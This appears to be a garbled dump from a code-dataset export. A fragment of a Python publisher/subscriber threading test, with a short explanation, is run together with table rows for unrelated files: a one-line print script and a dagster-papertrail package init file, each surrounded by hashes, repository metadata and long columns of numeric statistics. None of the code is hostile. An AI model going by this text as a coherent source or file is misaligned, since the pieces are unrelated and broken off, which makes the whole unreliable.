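def run_test():
    q = queue.Queue()
    msg = (1, 2, 3)  # stands in for Msg.Vector() with set(1, 2, 3)
    found = []
    pub = threading.Thread(target=publisher, args=(q, msg), daemon=True)
    sub = threading.Thread(target=subscriber, args=(q, msg, found), daemon=True)
    pub.start()
    sub.start()
    pub.join()
    sub.join()
    return found
```

Publishing the message repeatedly and polling with a timeout is what makes the original test robust to thread start-up order: whichever side starts first, the subscriber still sees at least one copy.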
bc3010ebef6a73224f62b6c4ac588d33a3fe7866 | 34 | py | Python | script1-master.py | julie-rudolph/ktbyers-pynet | f8f9f126e44a10bcd5f4886b6923693a70e69534 | [
"Apache-2.0"
] | null | null | null | script1-master.py | julie-rudolph/ktbyers-pynet | f8f9f126e44a10bcd5f4886b6923693a70e69534 | [
"Apache-2.0"
] | null | null | null | script1-master.py | julie-rudolph/ktbyers-pynet | f8f9f126e44a10bcd5f4886b6923693a70e69534 | [
"Apache-2.0"
] | null | null | null | print("script1 in master branch.")
| 17 | 33 | 0.764706 | 5 | 34 | 5.2 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.034483 | 0.147059 | 34 | 1 | 34 | 34 | 0.862069 | 0 | 0 | 0 | 0 | 0 | 0.735294 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
70ee17fb156c0e558ae9a41381bbf54da6eea839 | 233 | py | Python | python_modules/libraries/dagster-papertrail/dagster_papertrail/__init__.py | dbatten5/dagster | d76e50295054ffe5a72f9b292ef57febae499528 | [
"Apache-2.0"
] | 4,606 | 2018-06-21T17:45:20.000Z | 2022-03-31T23:39:42.000Z | python_modules/libraries/dagster-papertrail/dagster_papertrail/__init__.py | dbatten5/dagster | d76e50295054ffe5a72f9b292ef57febae499528 | [
"Apache-2.0"
] | 6,221 | 2018-06-12T04:36:01.000Z | 2022-03-31T21:43:05.000Z | python_modules/libraries/dagster-papertrail/dagster_papertrail/__init__.py | dbatten5/dagster | d76e50295054ffe5a72f9b292ef57febae499528 | [
"Apache-2.0"
] | 619 | 2018-08-22T22:43:09.000Z | 2022-03-31T22:48:06.000Z | from dagster.core.utils import check_dagster_package_version
from .loggers import papertrail_logger
from .version import __version__
check_dagster_package_version("dagster-papertrail", __version__)
__all__ = ["papertrail_logger"]
| 25.888889 | 64 | 0.849785 | 28 | 233 | 6.357143 | 0.428571 | 0.134831 | 0.213483 | 0.292135 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085837 | 233 | 8 | 65 | 29.125 | 0.835681 | 0 | 0 | 0 | 0 | 0 | 0.150215 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.6 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.